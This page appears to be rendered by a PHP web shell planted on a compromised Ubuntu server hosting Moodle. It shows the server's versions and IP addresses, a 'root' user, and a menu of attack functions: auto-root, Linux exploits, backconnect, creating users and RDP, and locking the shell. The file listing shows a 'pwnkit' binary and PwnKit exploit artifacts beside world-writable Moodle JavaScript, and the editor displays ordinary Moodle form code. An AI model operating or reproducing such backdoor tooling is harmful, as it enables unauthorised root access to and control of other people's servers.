Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
lib /
form /
amd /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
defaultcustom.js
2.39
KB
-rwxrwxrwx
events.js
2.51
KB
-rwxrwxrwx
filetypes.js
10.94
KB
-rwxrwxrwx
passwordunmask.js
10.09
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
showadvanced.js
7.8
KB
-rwxrwxrwx
submit.js
4.61
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : showadvanced.js
// This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * A class to help show and hide advanced form content. * * @module core_form/showadvanced * @class showadvanced * @package core_form * @copyright 2016 Damyon Wiese <damyon@moodle.com> * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ define(['jquery', 'core/log', 'core/str', 'core/notification'], function($, Log, Strings, Notification) { var SELECTORS = { FIELDSETCONTAINSADVANCED: 'fieldset.containsadvancedelements', DIVFITEMADVANCED: 'div.fitem.advanced', DIVADVANCEDSECTION: 'div#form-advanced-div', DIVFCONTAINER: 'div.fcontainer', MORELESSLINK: 'fieldset.containsadvancedelements .moreless-toggler' }, CSS = { SHOW: 'show', MORELESSACTIONS: 'moreless-actions', MORELESSTOGGLER: 'moreless-toggler', SHOWLESS: 'moreless-less' }, WRAPPERS = { FITEM: '<div class="fitem"></div>', FELEMENT: '<div class="felement"></div>', ADVANCEDDIV: '<div id="form-advanced-div"></div>' }, IDPREFIX = 'showadvancedid-'; /** @type {Integer} uniqIdSeed Auto incrementing number used to generate ids. */ var uniqIdSeed = 0; /** * ShowAdvanced behaviour class. * @param {String} id The id of the form. */ var ShowAdvanced = function(id) { this.id = id; var form = $(document.getElementById(id)); this.enhanceForm(form); }; /** @type {String} id The form id to enhance. */ ShowAdvanced.prototype.id = ''; /** * @method enhanceForm * @param {JQuery} form JQuery selector representing the form * @return {ShowAdvanced} */ ShowAdvanced.prototype.enhanceForm = function(form) { var fieldsets = form.find(SELECTORS.FIELDSETCONTAINSADVANCED); // Enhance each fieldset in the form matching the selector. fieldsets.each(function(index, item) { this.enhanceFieldset($(item)); }.bind(this)); // Attach some event listeners. // Subscribe more/less links to click event. form.on('click', SELECTORS.MORELESSLINK, this.switchState); // Subscribe to key events but filter for space or enter. form.on('keydown', SELECTORS.MORELESSLINK, function(e) { // Enter or space. if (e.which == 13 || e.which == 32) { return this.switchState(e); } return true; }.bind(this)); return this; }; /** * Generates a uniq id for the dom element it's called on unless the element already has an id. * The id is set on the dom node before being returned. * * @method generateId * @param {JQuery} node JQuery selector representing a single DOM Node. * @return {String} */ ShowAdvanced.prototype.generateId = function(node) { var id = node.prop('id'); if (typeof id === 'undefined') { id = IDPREFIX + (uniqIdSeed++); node.prop('id', id); } return id; }; /** * @method enhanceFieldset * @param {JQuery} fieldset JQuery selector representing a fieldset * @return {ShowAdvanced} */ ShowAdvanced.prototype.enhanceFieldset = function(fieldset) { var statuselement = $('input[name=mform_showmore_' + fieldset.prop('id') + ']'); if (!statuselement.length) { Log.debug("M.form.showadvanced::processFieldset was called on an fieldset without a status field: '" + fieldset.prop('id') + "'"); return this; } // Fetch some strings. Strings.get_strings([{ key: 'showmore', component: 'core_form' }, { key: 'showless', component: 'core_form' }]).then(function(results) { var showmore = results[0], showless = results[1]; // Generate more/less links. var morelesslink = $('<a href="#"></a>'); morelesslink.addClass(CSS.MORELESSTOGGLER); if (statuselement.val() === '0') { morelesslink.html(showmore); morelesslink.attr('aria-expanded', 'false'); } else { morelesslink.html(showless); morelesslink.attr('aria-expanded', 'true'); morelesslink.addClass(CSS.SHOWLESS); fieldset.find(SELECTORS.DIVFITEMADVANCED).addClass(CSS.SHOW); } // Build a list of advanced fieldsets. var idlist = []; fieldset.find(SELECTORS.DIVFITEMADVANCED).each(function(index, node) { idlist[idlist.length] = this.generateId($(node)); }.bind(this)); // Set aria attributes. morelesslink.attr('role', 'button'); morelesslink.attr('aria-controls', 'form-advanced-div'); var formadvancedsection = $(WRAPPERS.ADVANCEDDIV); fieldset.find(SELECTORS.DIVFITEMADVANCED).wrapAll(formadvancedsection); // Add elements to the DOM. var fitem = $(WRAPPERS.FITEM); fitem.addClass(CSS.MORELESSACTIONS); var felement = $(WRAPPERS.FELEMENT); felement.append(morelesslink); fitem.append(felement); fieldset.find(SELECTORS.DIVADVANCEDSECTION).before(fitem); return true; }.bind(this)).fail(Notification.exception); return this; }; /** * @method switchState * @param {Event} e Event that triggered this action. * @return {Boolean} */ ShowAdvanced.prototype.switchState = function(e) { e.preventDefault(); // Fetch some strings. Strings.get_strings([{ key: 'showmore', component: 'core_form' }, { key: 'showless', component: 'core_form' }]).then(function(results) { var showmore = results[0], showless = results[1], fieldset = $(e.target).closest(SELECTORS.FIELDSETCONTAINSADVANCED); // Toggle collapsed class. fieldset.find(SELECTORS.DIVFITEMADVANCED).toggleClass(CSS.SHOW); // Get corresponding hidden variable. var statuselement = $('input[name=mform_showmore_' + fieldset.prop('id') + ']'); // Invert it and change the link text. if (statuselement.val() === '0') { statuselement.val(1); $(e.target).addClass(CSS.SHOWLESS); $(e.target).html(showless); $(e.target).attr('aria-expanded', 'true'); } else { statuselement.val(0); $(e.target).removeClass(CSS.SHOWLESS); $(e.target).html(showmore); $(e.target).attr('aria-expanded', 'false'); } return true; }).fail(Notification.exception); return this; }; return { /** * Initialise this module. * @method init * @param {String} formid * @return {ShowAdvanced} */ init: function(formid) { return new ShowAdvanced(formid); } }; });
Close